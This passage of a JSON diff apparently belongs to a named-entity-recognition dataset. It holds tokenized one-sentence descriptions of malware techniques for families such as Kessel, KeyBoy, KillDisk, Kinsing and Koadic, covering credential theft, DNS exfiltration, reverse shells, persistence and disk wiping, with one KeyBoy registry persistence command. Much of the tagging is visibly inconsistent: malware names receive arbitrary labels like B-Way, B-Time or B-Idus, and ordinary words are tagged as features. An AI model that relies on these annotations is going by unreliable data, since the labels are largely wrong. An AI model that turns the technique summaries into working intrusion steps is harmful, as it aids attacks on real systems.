}, + { + "tokens": [ + "Kessel", + "can", + "RC4-encrypt", + "credentials", + "before", + "sending", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel", + "can", + "create", + "a", + "reverse", + "shell", + "between", + "the", + "infected", + "host", + "and", + "a", + "specified", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel", + "has", + "maliciously", + "altered", + "the", + "OpenSSH", + "binary", + "on", + "targeted", + "systems", + "to", + "create", + "a", + "backdoor." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel", + "can", + "split", + "the", + "data", + "to", + "be", + "exilftrated", + "into", + "chunks", + "that", + "will", + "fit", + "in", + "subdomains", + "of", + "DNS", + "queries." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel", + "has", + "decrypted", + "the", + "binary's", + "configuration", + "once", + "the", + "<code>main</code>", + "function", + "was", + "launched." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel's", + "configuration", + "is", + "hardcoded", + "and", + "RC4", + "encrypted", + "within", + "the", + "binary." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel", + "has", + "exfiltrated", + "information", + "gathered", + "from", + "the", + "infected", + "system", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel", + "can", + "exfiltrate", + "credentials", + "and", + "other", + "information", + "via", + "HTTP", + "POST", + "request,", + "TCP,", + "and", + "DNS." + ], + "ner_tags": [ + "B-Time", + "O", + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kessel", + "can", + "download", + "additional", + "modules", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel", + "has", + "trojanized", + "the", + "<sode>ssh_login</code>", + "and", + "<code>user-auth_pubkey</code>", + "functions", + "to", + "steal", + "plaintext", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Kessel", + "can", + "use", + "a", + "proxy", + "during", + "exfiltration", + "if", + "set", + "in", + "the", + "configuration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel", + "has", + "exfiltrated", + "data", + "via", + "hexadecimal-encoded", + "subdomain", + "fields", + "of", + "DNS", + "queries." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel", + "has", + "collected", + "the", + "system", + "architecture,", + "OS", + "version,", + "and", + "MAC", + "address", + "information." + ], + "ner_tags": [ + "B-Time", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kessel", + "has", + "collected", + "the", + "DNS", + "address", + "of", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Variants", + "of", + "Kevin", + "can", + "communicate", + "over", + "DNS", + "through", + "queries", + "to", + "the", + "server", + "for", + "constructed", + "domain", + "names", + "with", + "embedded", + "information." + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "create", + "directories", + "to", + "store", + "logs", + "and", + "other", + "collected", + "data." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "exfiltrate", + "data", + "to", + "the", + "C2", + "server", + "in", + "27-character", + "chunks." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "upload", + "logs", + "and", + "other", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "has", + "Base64-encoded", + "its", + "configuration", + "file." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "send", + "data", + "from", + "the", + "victim", + "host", + "through", + "a", + "DNS", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "assign", + "hard-coded", + "fallback", + "domains", + "for", + "C2." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "delete", + "files", + "created", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "hide", + "the", + "current", + "window", + "from", + "the", + "targeted", + "user", + "via", + "the", + "`ShowWindow`", + "API", + "function." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "download", + "files", + "to", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "generate", + "a", + "sequence", + "of", + "dummy", + "HTTP", + "C2", + "requests", + "to", + "obscure", + "traffic." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "use", + "the", + "`ShowWindow`", + "API", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "use", + "a", + "custom", + "protocol", + "tunneled", + "through", + "DNS", + "or", + "HTTP." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kevin", + "has", + "renamed", + "an", + "image", + "of", + "`cmd.exe`", + "with", + "a", + "random", + "name", + "followed", + "by", + "a", + "`.tmpl`", + "extension." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "Base32", + "encode", + "chunks", + "of", + "output", + "files", + "during", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "enumerate", + "the", + "OS", + "version", + "and", + "hostname", + "of", + "a", + "targeted", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "collect", + "the", + "MAC", + "address", + "and", + "other", + "information", + "from", + "a", + "victim", + "machine", + "using", + "`ipconfig/all`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "sleep", + "for", + "a", + "time", + "interval", + "between", + "C2", + "communication", + "attempts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Variants", + "of", + "Kevin", + "can", + "communicate", + "with", + "C2", + "over", + "HTTP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "use", + "a", + "renamed", + "image", + "of", + "`cmd.exe`", + "for", + "execution." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Kevin", + "can", + "compile", + "randomly-generated", + "MOF", + "files", + "into", + "the", + "WMI", + "repository", + "to", + "persistently", + "run", + "malware." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "attempts", + "to", + "collect", + "passwords", + "from", + "browsers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "uses", + "the", + "Dynamic", + "Data", + "Exchange", + "(DDE)", + "protocol", + "to", + "download", + "remote", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "one", + "version", + "of", + "KeyBoy,", + "string", + "obfuscation", + "routines", + "were", + "used", + "to", + "hide", + "many", + "of", + "the", + "critical", + "values", + "referenced", + "in", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "has", + "a", + "command", + "to", + "launch", + "a", + "file", + "browser", + "or", + "explorer", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "uses", + "<code>-w", + "Hidden</code>", + "to", + "conceal", + "a", + "PowerShell", + "window", + "that", + "downloads", + "a", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "has", + "a", + "download", + "and", + "upload", + "functionality." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "installs", + "a", + "keylogger", + "for", + "intercepting", + "credentials", + "and", + "keystrokes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "uses", + "PowerShell", + "commands", + "to", + "download", + "and", + "execute", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "KeyBoy", + "uses", + "custom", + "SSL", + "libraries", + "to", + "impersonate", + "SSL", + "in", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "uses", + "Python", + "scripts", + "for", + "installing", + "files", + "and", + "performing", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "KeyBoy", + "has", + "a", + "command", + "to", + "perform", + "screen", + "grabbing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "can", + "gather", + "extended", + "system", + "information,", + "such", + "as", + "information", + "about", + "the", + "operating", + "system,", + "disks,", + "and", + "memory." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "can", + "determine", + "the", + "public", + "or", + "WAN", + "IP", + "address", + "for", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "time-stomped", + "its", + "DLL", + "in", + "order", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "uses", + "VBS", + "scripts", + "for", + "installing", + "files", + "and", + "performing", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "KeyBoy", + "can", + "launch", + "interactive", + "shells", + "for", + "communicating", + "with", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "installs", + "a", + "service", + "pointing", + "to", + "a", + "malicious", + "DLL", + "dropped", + "to", + "disk." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KeyBoy", + "issues", + "the", + "command", + "<code>reg", + "add", + "“HKLM\\SOFTWARE\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon”</code>", + "to", + "achieve", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Keydnap", + "prompts", + "the", + "users", + "for", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Keydnap", + "uses", + "a", + "Launch", + "Agent", + "to", + "persist." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Keydnap", + "uses", + "a", + "copy", + "of", + "tor2web", + "proxy", + "for", + "HTTPS", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Keydnap", + "uses", + "Python", + "for", + "scripting", + "to", + "execute", + "additional", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Keydnap", + "uses", + "a", + "resource", + "fork", + "to", + "present", + "a", + "macOS", + "JPEG", + "or", + "text", + "file", + "icon", + "rather", + "than", + "the", + "executable's", + "icon", + "assigned", + "by", + "the", + "operating", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Keydnap", + "uses", + "the", + "keychaindump", + "project", + "to", + "read", + "securityd", + "memory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Keydnap", + "adds", + "the", + "setuid", + "flag", + "to", + "a", + "binary", + "so", + "it", + "can", + "easily", + "elevate", + "in", + "the", + "future." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Keydnap", + "puts", + "a", + "space", + "after", + "a", + "false", + ".jpg", + "extension", + "so", + "that", + "execution", + "actually", + "goes", + "through", + "the", + "Terminal.app", + "program." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Keydnap", + "uses", + "HTTPS", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "has", + "attempted", + "to", + "get", + "the", + "access", + "token", + "of", + "a", + "process", + "by", + "calling", + "<code>OpenProcessToken</code>.", + "If", + "KillDisk", + "gets", + "the", + "access", + "token,", + "then", + "it", + "attempt", + "to", + "modify", + "the", + "token", + "privileges", + "with", + "<code>AdjustTokenPrivileges</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "deletes", + "Application,", + "Security,", + "Setup,", + "and", + "System", + "Windows", + "Event", + "Logs." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "deletes", + "system", + "files", + "to", + "make", + "the", + "OS", + "unbootable.", + "KillDisk", + "also", + "targets", + "and", + "deletes", + "files", + "with", + "35", + "different", + "file", + "extensions." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "has", + "a", + "ransomware", + "component", + "that", + "encrypts", + "files", + "with", + "an", + "AES", + "key", + "that", + "is", + "also", + "RSA-1028", + "encrypted." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "overwrites", + "the", + "first", + "sector", + "of", + "the", + "Master", + "Boot", + "Record", + "with", + "“0x00”." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "has", + "the", + "ability", + "to", + "quit", + "and", + "delete", + "itself." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "has", + "used", + "the", + "<code>FindNextFile</code>", + "command", + "as", + "part", + "of", + "its", + "file", + "deletion", + "process." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "registers", + "as", + "a", + "service", + "under", + "the", + "Plug-And-Play", + "Support", + "name." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "has", + "called", + "the", + "Windows", + "API", + "to", + "retrieve", + "the", + "hard", + "disk", + "handle", + "and", + "shut", + "down", + "the", + "machine." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "uses", + "VMProtect", + "to", + "make", + "reverse", + "engineering", + "the", + "malware", + "more", + "difficult." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "has", + "called", + "<code>GetCurrentProcess</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "KillDisk", + "terminates", + "various", + "processes", + "to", + "get", + "the", + "user", + "to", + "reboot", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "loads", + "and", + "executes", + "functions", + "from", + "a", + "DLL." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "retrieves", + "the", + "hard", + "disk", + "name", + "by", + "calling", + "the", + "<code>CreateFileA", + "to", + "\\\\.\\PHYSICALDRIVE0</code>", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KillDisk", + "attempts", + "to", + "reboot", + "the", + "machine", + "by", + "terminating", + "specific", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "searched", + "<code>bash_history</code>", + "for", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "attempted", + "to", + "brute", + "force", + "hosts", + "over", + "SSH." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kinsing", + "was", + "executed", + "with", + "an", + "Ubuntu", + "container", + "entry", + "point", + "that", + "runs", + "shell", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "used", + "crontab", + "to", + "download", + "and", + "run", + "shell", + "scripts", + "every", + "minute", + "to", + "ensure", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "was", + "run", + "through", + "a", + "deployed", + "Ubuntu", + "container." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Kinsing", + "was", + "executed", + "in", + "an", + "Ubuntu", + "container", + "deployed", + "via", + "an", + "open", + "Docker", + "daemon", + "API." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "used", + "the", + "find", + "command", + "to", + "search", + "for", + "specific", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "downloaded", + "additional", + "lateral", + "movement", + "scripts", + "from", + "C2." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "used", + "chmod", + "to", + "modify", + "permissions", + "on", + "key", + "files", + "for", + "use." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "searched", + "for", + "private", + "keys." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "used", + "ps", + "to", + "list", + "processes." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "used", + "a", + "script", + "to", + "parse", + "files", + "like", + "<code>/etc/hosts</code>", + "and", + "SSH", + "<code>known_hosts</code>", + "to", + "discover", + "remote", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "created", + "and", + "run", + "a", + "Bitcoin", + "cryptocurrency", + "miner." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "used", + "SSH", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "used", + "Unix", + "shell", + "scripts", + "to", + "execute", + "commands", + "in", + "the", + "victim", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "used", + "valid", + "SSH", + "credentials", + "to", + "access", + "remote", + "hosts." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kinsing", + "has", + "communicated", + "with", + "C2", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kivars", + "has", + "the", + "ability", + "to", + "uninstall", + "malware", + "from", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kivars", + "has", + "the", + "ability", + "to", + "list", + "drives", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kivars", + "has", + "the", + "ability", + "to", + "conceal", + "its", + "activity", + "through", + "hiding", + "active", + "windows." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kivars", + "has", + "the", + "ability", + "to", + "download", + "and", + "execute", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Kivars", + "has", + "the", + "ability", + "to", + "initiate", + "keylogging", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kivars", + "has", + "the", + "ability", + "to", + "remotely", + "trigger", + "keyboard", + "input", + "and", + "mouse", + "clicks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Kivars", + "has", + "the", + "ability", + "to", + "capture", + "screenshots", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "use", + "SSL", + "and", + "TLS", + "for", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "Koadic", + "has", + "2", + "methods", + "for", + "elevating", + "integrity.", + "It", + "can", + "bypass", + "UAC", + "through", + "`eventvwr.exe`", + "and", + "`sdclt.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "retrieve", + "the", + "current", + "content", + "of", + "the", + 